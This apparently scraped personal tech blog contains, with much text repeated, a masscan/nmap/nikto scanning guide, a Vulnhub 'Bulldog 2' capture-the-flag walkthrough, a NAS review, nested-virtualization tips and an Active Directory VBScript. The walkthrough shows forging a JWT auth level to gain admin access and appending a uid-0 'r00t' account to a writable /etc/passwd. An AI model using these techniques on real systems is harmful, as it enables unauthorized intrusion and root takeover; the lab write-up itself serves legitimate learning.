I changed the CSS on this blog because frankly I am elderly and white on black, while surely super cool, was also impossible for me to read. Get off my lawn.
WARNING: The following is not subtle. If you are in an enterprise and the SOC is monitoring your network with a string telephone, they'll still probably catch this. Use in a white box pen test or capture the flag, not a red team engagement, or fine tune a lot more to your needs. And while port scanning by itself is arguably not a crime, I am not a lawyer and they are expensive. Obviously then, always, scan only networks you have permission to scan or North Korea (kidding!)
Scanning a network segment with nmap can be interminable, even with relatively aggressive options set. Scanning a network with Masscan is super fast but returns very little information. Combining the two can be a lot of tedious work. If you can automate that with a script that's definitely the way to go, but you may have to scan from an environment where you can't upload and/or text editing is awkward, or you may just need something quick and dirty. What do?
(Or you may just be in this to learn a little about the command line.)
Try these commands. They do rely on having nmap and masscan installed. I'm also not claiming that they're the most beautiful way of doing any of this; suggestions are welcome.
STAGE 1
cat
/usr/share/nmap/nmap-services | sort -r -k3 | grep "tcp" | awk
'{print $2}' | head -n1024 | cut -d "/" -f 1 >>
top1024ports.txt
The command above uses nmap's services file, which has a frequency count for every port, to pull the 1024 most common TCP ports and save them in order by themselves to a file. You'll need this in a minute. If you can't or don't want to write to disk you can combine this bit with the next one, but that creates a command so long and unwieldy I decided not to do it here.
If you need UDP, change the grep portion of the command to udp and save to a different filename, for example top1024uports.txt. If you need more or fewer ports, change the head portion of the command.
STAGE 2
for i in $(cat top1024ports.txt);do echo "Port $i Scan";masscan 10.0.0.0/23 --ports
$i --rate =10000 | cut -d " " -f 6 | xargs -I IP -P 100 nmap -sT -sV
-sC -Pn -T4 -n -p $i IP | tee $i.scan;done
or
for i in $(cat top1024uports.txt);do echo "Port $i Scan";masscan 10.0.0.0/23 --ports
U:$i --rate =10000 | cut -d " " -f 6 | xargs -I IP -P 100 nmap -sU -sV -sC -Pn -T4 -n -p $i IP | tee $i.scan;done
Change the 10.0.0.0/23 to whatever IP address and subnet you want to scan. The only difference between these two commands is that the latter is for UDP. If you want specific ports because you can't or don't want to dump to a file, do something like this for the first portion: for i in 22 23 80 445
What this does is to pull the port numbers from the file or command line in order, gives you a nice printed progress indicator, uses masscan (which is vastly faster than nmap) to scan your subnet, uses cut and xargs to slice and dice the results, and fires up up to 100 simultaneous copies of nmap to aggressively version scan anything that masscan finds. The results for each port are saved to a separate text file.
If you aren't familiar with each command used in this piped-together string, such as xargs and cut, I'm going to strongly recommend checking them out on Google or their man pages. Once you are familiar with them (and I don't claim to be an expert myself) you will use them for stuff like this constantly. Then you will eventually learn awk and sed, and then your journey to the neckbeard side (figuratively if your gender doesn't do beards, otherwise probably literally) will be irreversible.
If you're in this business, you'll also want to be familiar with the nmap command-line arguments. In this case we are doing a TCP scan (-sT) with version info (-sV) without caring about whether the host responds to ping (-Pn) and we are running scripts against what we find. Scripts are something you want to be careful with, and if you're being very conservative you may want to explicitly tell nmap to run only safe scripts that are unlikely to knock over the host (--script safe).
Be conservative in general to start here. You know your own network best, but if you're scanning a subnet through a branch office firewall or something, 100 aggressive nmap scans could be a resume generating event. If you are scanning through the sort of clever firewall that responds with something on every port whether it's really open or not, masscan might cause it to fall over without even needing the nmap deathblow. Use the masscan --rate option to make masscan less aggressive. Use T3 instead of T4 to make nmap less aggressive, and cut the -P 100 in the xargs portion of the command down to a more reasonable value if you want fewer simultaneous nmap processes.
I will note that scanning from a Kali Virtualbox VM with just 2 GB of allocated RAM to a /24 on another vlan routed by my SOHO router these commands as written had no problem at all, and finished identifying and version scanning 1024 ports on 512 addresses (not all up) in under 3 hours, most of which was just waiting for the receive thread of the asynchronous masscan processes to time out. I haven't timed a pure nmap scan from the same box for comparison, but my guess is it would finish roughly a week from when hell freezes over.
One last warning: doing this has a tendency to jack up the terminal real bad, presumably because there are up to 100 processes writing to stdout at once (fortunately in the case on nmap they write in order so it's all readable). If this happens, don't panic. Just type the reset command and press enter. You may not be able to see yourself typing, but if it works, the screen will clear and the terminal should work normally again.
BONUS ROUND
Let's say you have used the commands above to scan and then version scan a bunch of hosts with stuff running on port 80, and the command above has dumped the results to 80.scan. Do you now have to go through that text file manually if you want to, say, run Nikto, a text-based web vulnerability scanner, against each of those http hosts? Why no, you do not have to do that manually! I'm guessing that you guessed that you do not.
cat
80.scan | grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n
| uniq | xargs -P 10 -I {} nikto -host http://{} -o
nikto{}.txt
UNIX purists would say that this is an inappropriate use of cat to read just one file. Don't @ me.
The grep syntax here is a regular expression, which is a whole other mountain to climb if you are just getting started with this stuff, but this one is pretty easy: it looks at each line of the scan file for four groups of 1-3 digits separated by dots, which is to say, an IP address. The sort and uniq commands sort the resulting list of IPs and dump duplicates. Then our old friend xargs takes *those* results and launches 10 nikto threads that scan 10 web hosts at a time, dumping the results in each case to a file called nikto{}.txt, where {} will get subbed out for the IP address. So if you scan 10 hosts you get 10 different .txt files with neat results, all done at once.
The catch here is that 10 nikto processes don't handle writing to the same stdout as cleanly as nmap seems to. You will basically get gibberish on the screen. But the files themselves will be clean. Don't forget to use the reset trick to fix your terminal when you're finished.
Happy network scanning!
Blog
Bryan Buckman
Sunday, August 5, 2018
Thursday, August 2, 2018
Walkthrough: Bulldog: 2 Vulnerable VM
First post in four years. I do different stuff now.
This is a walkthrough of the Vulnhub VM Bulldog: 2 vulnerable virtual machine by Nick Frichette. Full disclosure: Nick and I used to work together briefly, and I shamelessly asked him for hints, which he generously gave.
Spoilers ahoy.
I'm going to do a very honest walkthrough here, so I'll point out where I got stuck, where I cheated or begged Nick for help, and where I screwed up in predictable ways. Enjoy my suffering.
If you aren't familiar with Vulnhub it's easy to get started. Just install Virtualbox, download the VM from the link above and double click the OVA, and it should install straight to Virtualbox. When it finishes booting Nick has thoughtfully included a script that displays the IP it picks up from DHCP right there on the boot screen. This saves scanning for it.
If you do scan with nmap, which is usually the first thing to do to a vulnerable VM, you will discover that port 80 is the only thing open. This is evidently a webapp challenge, my bete noir. Forewarned is forearmed.
Bulldog 2's web page suggests that it's a social media site run by a social media company that's been hacked before (see Bulldog 1) and as a result has shut down registration for new users. There are a few things you can poke around on, including a login page, but no obvious way to login. It's at this point where on a webapp I typically view the source in Chrome Developer Tools, deobfuscate any javascript (the little curly bracket button beneath the script source) and save it off for analysis.
I am not a JavaScript wizard, much less a fancy modern JavaScript framework wizard, but I noticed pretty quickly that the login and registration functions for this app are built in to the client side, and that even though the registration page doesn't work, the endpoint for it is still there and still should take a post request.
And then I got stuck and asked Nick for help, because trying to send the post request got me a HTTP 502 error. As it turns out, I was on the right track, it's just that, you know, the post parameters are JSON and JSON requires quotes. Which I knew. Duh. But Nick's hints do make me think there are other ways in I missed as well. Once you do it correctly, it's pretty easy to register a new user (click to embiggen):
When you log in as your new user, you get a JWT token, and here I cheated for the second and final time: I was pretty sure the JWT token could be manipulated, but not how. It turns out that this is basically JSON encoded with Base64, so I'm sure it can be manipulated a lot of ways (those wacky web developers) but I chose an online encoder/decoder. As far as how to manipulate it, I'd already spotted an admin role in the javascript source below, so I just changed my auth level to that 'master_admin_user' and re-encoded:

Doing that, and then changing the locally stored value to the re-encoded one with the Chrome Developer Tools, got me a nifty new Admin link on the web page. Clicking that link gets you a secondary login page:



Since the vulnerable machine had Internet access (on an isolated vlan) I was able to use one of my favorite reverse shell one-liners.

Success! Bulldog 2, The Reckoning:

For privilege escalation I decided to punish myself a bit since I'd already cheated and rather than uploading one of the Linux privilege escalation checker scripts I went for enumerating the box by hand. Fortunately about the third thing I tried was a global find for writable files, which turned up a glaring suspect.

Ruh roh.
Here I took another detour. I immediately went for a classic:
It turns out that this does not work on modern Linuxes. You will get an authentication error when you try to su as r00t with a blank password. After a bit of Googling I determined that you have to set a password with the correct encoding.
After this is done, you can do the same trick to echo a new root user into the file, this time with a working password, and then su to the user.

Subsequent to this you are expected to do the root dance. I won't spoil the final message for you in case you want to walk through it yourself.
This was a great VM. It's unusual for its use of modern Javascript frameworks and I learned a great deal from it that I may use on actual pentests, should anyone be foolish enough to allow me to pentest webapps. Overall I'd give it a strong thumbs up even if I didn't know Nick, and I look forward to his next one.
This is a walkthrough of the Vulnhub VM Bulldog: 2 vulnerable virtual machine by Nick Frichette. Full disclosure: Nick and I used to work together briefly, and I shamelessly asked him for hints, which he generously gave.
Spoilers ahoy.
I'm going to do a very honest walkthrough here, so I'll point out where I got stuck, where I cheated or begged Nick for help, and where I screwed up in predictable ways. Enjoy my suffering.
If you aren't familiar with Vulnhub it's easy to get started. Just install Virtualbox, download the VM from the link above and double click the OVA, and it should install straight to Virtualbox. When it finishes booting Nick has thoughtfully included a script that displays the IP it picks up from DHCP right there on the boot screen. This saves scanning for it.
If you do scan with nmap, which is usually the first thing to do to a vulnerable VM, you will discover that port 80 is the only thing open. This is evidently a webapp challenge, my bete noir. Forewarned is forearmed.
Bulldog 2's web page suggests that it's a social media site run by a social media company that's been hacked before (see Bulldog 1) and as a result has shut down registration for new users. There are a few things you can poke around on, including a login page, but no obvious way to login. It's at this point where on a webapp I typically view the source in Chrome Developer Tools, deobfuscate any javascript (the little curly bracket button beneath the script source) and save it off for analysis.
I am not a JavaScript wizard, much less a fancy modern JavaScript framework wizard, but I noticed pretty quickly that the login and registration functions for this app are built in to the client side, and that even though the registration page doesn't work, the endpoint for it is still there and still should take a post request.
l.prototype.onRegisterSubmit = function() {
var l = this
, n = {
name: this.name,
email: this.email,
username: this.username,
password: this.password
};
}
return l.prototype.registerUser =
function(l) {
var n = new x.Headers;
return
n.append("Content-Type", "application/json"),
this.http.post("/users/register", l, {
headers: n
}).map(function(l) {
return l.json()
})
}
And then I got stuck and asked Nick for help, because trying to send the post request got me a HTTP 502 error. As it turns out, I was on the right track, it's just that, you know, the post parameters are JSON and JSON requires quotes. Which I knew. Duh. But Nick's hints do make me think there are other ways in I missed as well. Once you do it correctly, it's pretty easy to register a new user (click to embiggen):
When you log in as your new user, you get a JWT token, and here I cheated for the second and final time: I was pretty sure the JWT token could be manipulated, but not how. It turns out that this is basically JSON encoded with Base64, so I'm sure it can be manipulated a lot of ways (those wacky web developers) but I chose an online encoder/decoder. As far as how to manipulate it, I'd already spotted an admin role in the javascript source below, so I just changed my auth level to that 'master_admin_user' and re-encoded:
l.prototype.isAdmin = function() {
var l =
localStorage.getItem("user");
return null !== l &&
"master_admin_user" == JSON.parse(l).auth_level
}

Doing that, and then changing the locally stored value to the re-encoded one with the Chrome Developer Tools, got me a nifty new Admin link on the web page. Clicking that link gets you a secondary login page:

The line about using a CLI tool to log in seemed to me to be a strong hint about command injection. Unfortunately, it's a blind command injection. After much messing with both parameters I was about to give up and try SQL Injection or something when I realized the reason my ping wasn't working was a firewall. Basic infrastructure troubleshooting FTW.





Ruh roh.
Here I took another detour. I immediately went for a classic:
echo "r00t:x:0:0:root:/root:/bin/bash" >> /etc/passwd
It turns out that this does not work on modern Linuxes. You will get an authentication error when you try to su as r00t with a blank password. After a bit of Googling I determined that you have to set a password with the correct encoding.
After this is done, you can do the same trick to echo a new root user into the file, this time with a working password, and then su to the user.

Subsequent to this you are expected to do the root dance. I won't spoil the final message for you in case you want to walk through it yourself.
This was a great VM. It's unusual for its use of modern Javascript frameworks and I learned a great deal from it that I may use on actual pentests, should anyone be foolish enough to allow me to pentest webapps. Overall I'd give it a strong thumbs up even if I didn't know Nick, and I look forward to his next one.
Sunday, April 27, 2014
Synology DS1513+ mini-review
I've been meaning to write this post, and to pick up my commitment to this blog, for four months. So yeah.
This is not a full review of the performance specs, etc. of the Synology 1513+. You can find something like that here.
This is just a brief review of setup and daily use of the DS1513+ as a media storage device. The DS1513+ is frankly grotesque overkill for this purpose, but I wanted something future-proof, and I got it. Synology's custom RAID algorithm allows adding disks of different sizes on the fly, and if that isn't enough, hardware expansion units are available to allow you to add more disks. I went with five WD Red drives, which are supposedly designed specifically for use in NAS enclosures. They're 5400 rpm, so not fast, but they were inexpensive (the price has since gone up) and they run cool. Synology's magic NAS software (about which more in a moment) says the entire enclosure is running at 88 degrees Farenheit, which is remarkably low, and there is a turbo fan setting I'm not currently using. I suspect if you wanted to spring for them you could run 7200 rpm drives without a temperature issue. I have not thus far noticed storage to be a bottleneck.
Setup of the unit is a weird process. Essentially a Synology utility searches for and finds the device on the LAN and then pushes the Synology DiskStation package to it. As a sysadmin who has been scarred by more than one firmware update gone bad this made me nervous, even though DiskStation is just a webserver add-on and not the underlying firmware itself. DiskStation is a browser-based graphical interface. Obligatory pretty picture:
The main issue with the install was that I'd also purchased a managed switch with the intent of enabling both link aggregation and jumbo frames in order to make the connection faster (the NAS has 4 ethernet ports). This took some digging through deep options in both the NAS and the switch to accomplish, and it would not have been doable without some network experience. On the other hand, no one without network experience would have known about or attempted it, so that's fine.
Once fully up and running the thing has been delightful. No hiccups, no dropped frames on 1080p video even when streamed over my crappy old 802.11g wireless bridge to my home office in a back room. Particularly nice has been the combination of Synology Download Station and the Download Station Chrome Plugin, which allows me to click a magnet link in Chrome on any device in the house and have the downloading handled entirely on the NAS. For my legal torrents of Linux distributions, of course.
There are all sorts of other advanced features and downloadable plugins that allow you to do things with this NAS that I've frankly never imagined doing on a NAS. Use it as an iSCSI SAN. Turn it into an LDAP server, DNS, server, a host for an enterprise resource planning system (?!), or about a million other things apparently. I haven't tried much of this, but Synology seems determined to make their products as open and flexible as possible, which is a big plus to me.
I paid quite a bit less for this NAS than it's now selling for, which is peculiar, so you may want to look for bargains, or check out the other Synology models. Git you one.
This is not a full review of the performance specs, etc. of the Synology 1513+. You can find something like that here.
This is just a brief review of setup and daily use of the DS1513+ as a media storage device. The DS1513+ is frankly grotesque overkill for this purpose, but I wanted something future-proof, and I got it. Synology's custom RAID algorithm allows adding disks of different sizes on the fly, and if that isn't enough, hardware expansion units are available to allow you to add more disks. I went with five WD Red drives, which are supposedly designed specifically for use in NAS enclosures. They're 5400 rpm, so not fast, but they were inexpensive (the price has since gone up) and they run cool. Synology's magic NAS software (about which more in a moment) says the entire enclosure is running at 88 degrees Farenheit, which is remarkably low, and there is a turbo fan setting I'm not currently using. I suspect if you wanted to spring for them you could run 7200 rpm drives without a temperature issue. I have not thus far noticed storage to be a bottleneck.
Setup of the unit is a weird process. Essentially a Synology utility searches for and finds the device on the LAN and then pushes the Synology DiskStation package to it. As a sysadmin who has been scarred by more than one firmware update gone bad this made me nervous, even though DiskStation is just a webserver add-on and not the underlying firmware itself. DiskStation is a browser-based graphical interface. Obligatory pretty picture:
The main issue with the install was that I'd also purchased a managed switch with the intent of enabling both link aggregation and jumbo frames in order to make the connection faster (the NAS has 4 ethernet ports). This took some digging through deep options in both the NAS and the switch to accomplish, and it would not have been doable without some network experience. On the other hand, no one without network experience would have known about or attempted it, so that's fine.
Once fully up and running the thing has been delightful. No hiccups, no dropped frames on 1080p video even when streamed over my crappy old 802.11g wireless bridge to my home office in a back room. Particularly nice has been the combination of Synology Download Station and the Download Station Chrome Plugin, which allows me to click a magnet link in Chrome on any device in the house and have the downloading handled entirely on the NAS. For my legal torrents of Linux distributions, of course.
There are all sorts of other advanced features and downloadable plugins that allow you to do things with this NAS that I've frankly never imagined doing on a NAS. Use it as an iSCSI SAN. Turn it into an LDAP server, DNS, server, a host for an enterprise resource planning system (?!), or about a million other things apparently. I haven't tried much of this, but Synology seems determined to make their products as open and flexible as possible, which is a big plus to me.
I paid quite a bit less for this NAS than it's now selling for, which is peculiar, so you may want to look for bargains, or check out the other Synology models. Git you one.
Wednesday, August 21, 2013
Nested Virtualization with VMWare Workstation and KVM
I once intended for this to be a daily blog. I see it's been two years since my last entry. Ooops.
Anyway, I overcame a technical challenge (i.e., snafu) today for which Google wasn't much help. So here we go.
Scenario: I have a PC. It has 32 GB of RAM. I use it both for games and other stuff requiring Windows, and for certification labs, which I run on WMWare Workstation because I got a free license when I passed my VCP.
I recently began studying for my RHCSA and eventually RHCE. The books for these certifications come with lab virtual machines. The lab VMs are in KVM format. KVM is a Red Hat exam certification topic, and it doesn't run on Windows.
I didn't want to convert the VMs to VMWare format because I need to learn KVM anyway. But I considered it. Everything I found on Google was about converting VMs the other direction. This doesn't bode super-well for the market value of my VMWare certification, but never mind.
The free VMWare converter does not recognize KVM format.
Giving up on the conversion idea (though I'm sure there is some way to make it work) I moved on to a nested scenario - running the lab VMs on a CentOS host which is itself a guest of VMWare Workstation under Windows. The RedHat lab guide (the McGraw Hill one, Michael Jang is the author) explicitly says not to do this; that KVM will not install on a VM, or if it does it will act badly. My inner first-world anarchist accepted the challenge.
In fact, it worked immediately, but it sucked (technical term). Performance was unbearable. So...
Objective: to make this nested virtualization scenario pleasant enough to use.
Resolution: It became clear pretty quickly, though I don't recall how, that this was a hardware virtualization problem. That is, the virtualization boost that modern processors provide to virtualization guests wasn't being relayed on to the guests of the guest. There is an option to do this in VMWare called "Virtualize Intel VT-x/EPT or AMD-V/RVI".
Unfortunately it was greyed out on my VMs. Fortunately adding it is just a matter of adding the following line at the end of the .vmx file for the VM:
vhv.enable = "true"
From there, shut down and re-enable the RedHat guest host (host guest?) VM. The RedHat host guest (guest host?) should now see the its CPU as having virtualization assist. You can verify like so:
[user@CentOS64-VHost ~]$ virt-host-validate
QEMU: Checking for hardware virtualization : PASS
QEMU: Checking for device /dev/kvm : PASS
QEMU: Checking for device /dev/vhost-net : PASS
QEMU: Checking for device /dev/net/tun : PASS
LXC: Checking for Linux >= 2.6.26 : PASS
The last thing that must be done is to enable the vmx processor option (for the passthrough hardware assist) in the virtual machine settings of the guests (guest guests?) in KVM. The easiest way to do this is to set advanced processor options when you create a VM in KVM. Then use the "Copy Host CPU Configuration" button.
Anyway, I overcame a technical challenge (i.e., snafu) today for which Google wasn't much help. So here we go.
Scenario: I have a PC. It has 32 GB of RAM. I use it both for games and other stuff requiring Windows, and for certification labs, which I run on WMWare Workstation because I got a free license when I passed my VCP.
I recently began studying for my RHCSA and eventually RHCE. The books for these certifications come with lab virtual machines. The lab VMs are in KVM format. KVM is a Red Hat exam certification topic, and it doesn't run on Windows.
I didn't want to convert the VMs to VMWare format because I need to learn KVM anyway. But I considered it. Everything I found on Google was about converting VMs the other direction. This doesn't bode super-well for the market value of my VMWare certification, but never mind.
The free VMWare converter does not recognize KVM format.
Giving up on the conversion idea (though I'm sure there is some way to make it work) I moved on to a nested scenario - running the lab VMs on a CentOS host which is itself a guest of VMWare Workstation under Windows. The RedHat lab guide (the McGraw Hill one, Michael Jang is the author) explicitly says not to do this; that KVM will not install on a VM, or if it does it will act badly. My inner first-world anarchist accepted the challenge.
In fact, it worked immediately, but it sucked (technical term). Performance was unbearable. So...
Objective: to make this nested virtualization scenario pleasant enough to use.
Resolution: It became clear pretty quickly, though I don't recall how, that this was a hardware virtualization problem. That is, the virtualization boost that modern processors provide to virtualization guests wasn't being relayed on to the guests of the guest. There is an option to do this in VMWare called "Virtualize Intel VT-x/EPT or AMD-V/RVI".
Unfortunately it was greyed out on my VMs. Fortunately adding it is just a matter of adding the following line at the end of the .vmx file for the VM:
vhv.enable = "true"
From there, shut down and re-enable the RedHat guest host (host guest?) VM. The RedHat host guest (guest host?) should now see the its CPU as having virtualization assist. You can verify like so:
[user@CentOS64-VHost ~]$ virt-host-validate
QEMU: Checking for hardware virtualization : PASS
QEMU: Checking for device /dev/kvm : PASS
QEMU: Checking for device /dev/vhost-net : PASS
QEMU: Checking for device /dev/net/tun : PASS
LXC: Checking for Linux >= 2.6.26 : PASS
The last thing that must be done is to enable the vmx processor option (for the passthrough hardware assist) in the virtual machine settings of the guests (guest guests?) in KVM. The easiest way to do this is to set advanced processor options when you create a VM in KVM. Then use the "Copy Host CPU Configuration" button.
Restart the KVM guest if you need to, and you're good. Fast nested guests.
Monday, June 6, 2011
VBScript - Get Service Tags of All Dell PCs in Active Directory
I used to have access to Kaseya which will pull this for you, but my new employer doesn't use it. This script has some issues (if a PC is offline it will just throw in the service tag of the last one) but it was quick and dirty enough for my purposes today. I observe that Blogger doesn't handle code well, so beware of formatting. I'll have to find a way around this and blog that.
'Pulls the Dell Service Tag or equivalent of every computer in AD and writes them to a text file with computer 'name
On Error Resume Next
Const ADS_SCOPE_SUBTREE = 2
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile("C:\users\example\desktop\test.txt", 8, True)
Set objConnection = CreateObject("ADODB.Connection")
Set objCommand = CreateObject("ADODB.Command")
Set WshShell = WScript.CreateObject("WScript.Shell")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCOmmand.ActiveConnection = objConnection
objCommand.CommandText = _
"Select Name, Location from 'LDAP://DC=example,DC=corp' " _
& "Where objectClass='computer'"
objCommand.Properties("Page Size") = 1000
objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE
Set objRecordSet = objCommand.Execute
objRecordSet.MoveFirst
Do Until objRecordSet.EOF
strComputer=objRecordSet.Fields("Name").Value
Set objWMIService = GetObject("winmgmts:" & _
"{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
For Each objSMBIOS in objWMIService.ExecQuery("Select * from Win32_SystemEnclosure")
WriteStuff.WriteLine strComputer & " Serial Number: " & objSMBIOS.SerialNumber
Next
objRecordSet.MoveNext
Loop
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
MsgBox "Done"
'Pulls the Dell Service Tag or equivalent of every computer in AD and writes them to a text file with computer 'name
On Error Resume Next
Const ADS_SCOPE_SUBTREE = 2
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile("C:\users\example\desktop\test.txt", 8, True)
Set objConnection = CreateObject("ADODB.Connection")
Set objCommand = CreateObject("ADODB.Command")
Set WshShell = WScript.CreateObject("WScript.Shell")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCOmmand.ActiveConnection = objConnection
objCommand.CommandText = _
"Select Name, Location from 'LDAP://DC=example,DC=corp' " _
& "Where objectClass='computer'"
objCommand.Properties("Page Size") = 1000
objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE
Set objRecordSet = objCommand.Execute
objRecordSet.MoveFirst
Do Until objRecordSet.EOF
strComputer=objRecordSet.Fields("Name").Value
Set objWMIService = GetObject("winmgmts:" & _
"{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
For Each objSMBIOS in objWMIService.ExecQuery("Select * from Win32_SystemEnclosure")
WriteStuff.WriteLine strComputer & " Serial Number: " & objSMBIOS.SerialNumber
Next
objRecordSet.MoveNext
Loop
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
MsgBox "Done"
Thursday, June 2, 2011
Old blog, new days
I'm intending this to be a chronicle of the daily struggles to be a good IT engineer as well as a running commentary on the technorati. The migrations of our jobs to the cloud and overseas, fighting the long defeat against bad security, the slow erosion of our privacy, and all the other fun trends that make technology exciting.
Some days you'll get commentary; some days it'll be a link blog.
I'll try to do an appropriate level of page decoration here over the next few days.
Some days you'll get commentary; some days it'll be a link blog.
I'll try to do an appropriate level of page decoration here over the next few days.
Subscribe to:
Posts (Atom)